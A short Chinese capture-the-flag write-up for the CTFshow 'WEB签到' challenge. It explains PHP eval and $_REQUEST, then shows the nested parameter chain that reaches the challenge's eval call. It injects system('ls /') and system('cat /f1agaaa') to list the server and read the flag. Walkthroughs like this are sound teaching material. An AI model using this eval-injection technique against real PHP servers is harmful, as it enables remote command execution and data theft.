CTFSHOW菜狗杯—WEB签到

知识点补充:

eval函数:把传入的字符串当作 PHP 代码直接执行 ,比如eval("echo 'hello';")会执行echo 'hello';

REQUEST:超全局变量, 把用户通过GET(URL 里传的参数)、POST(表单 / 接口传的参数)、COOKIE(浏览器存的参数)这三种方式传给服务器的参数,全都整合到一个 "容器" 里。

解题思路

php 复制代码
eval($_REQUEST
        [$_GET
            [$_POST
                [$_COOKIE
                    ['CTFshow-QQ群:'
                    ]
                ]
            ]
        ]
      [6][0][7][5][8][0][9][4][4]
    )
   ;

将代码规整一下后,只需要从内往外一步一步进行传参即可

1.cookie:CTFshow-QQ群

2.post_var=get_var

3.get_var=requst_var

4.requst_var=[6][0][7][5][8][0][9][4][4]

5.requst_var[6][0][7][5][8][0][9][4][4]=system('ls /')(由于这已经是最外层,在进行传参时得使用&与上一条语句进行拼接)

通过system("ls /")发现有flagaaa字样,就可以通过system("cat /f1agaaa");进行查看

相关推荐
HackTwoHub36 分钟前
Linux 内核史诗级本地提权 全网深度复现、原理完整分析( CVE-2026-31431)
linux·运维·安全·web安全·网络安全·代码审计·安全架构
jeffwang1 小时前
我做了个让 AI 看屏幕跑测试的工具,因为 Playwright 测不了我的 Flutter Web
前端
HSunR1 小时前
dify 搭建ai作业批改流
开发语言·前端·javascript
代码不加糖1 小时前
2026 跨境电商独立站实战:从 0 到 1 搭建高转化 SaaS 商城(附源码)
开发语言·前端·javascript
亲亲小宝宝鸭2 小时前
拖一拖控件,拖出个问卷(低代码平台)
前端·低代码
江南十四行2 小时前
ReAct Agent 基本理论与项目实战(一)
前端·react.js·前端框架
We་ct2 小时前
LeetCode 72. 编辑距离:动态规划经典题解
前端·算法·leetcode·typescript·动态规划
小呆呆6663 小时前
Codex 穷鬼大救星
前端·人工智能·后端
X7x53 小时前
筑牢网络安全防线:Web应用防火墙(WAF)全面解析
web安全·网络安全·安全架构·waf
当时只道寻常3 小时前
Vue3 + IntersectionObserver 实现高性能图片懒加载
前端